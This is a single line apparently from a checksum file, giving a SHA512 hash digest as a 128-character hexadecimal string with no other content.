SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97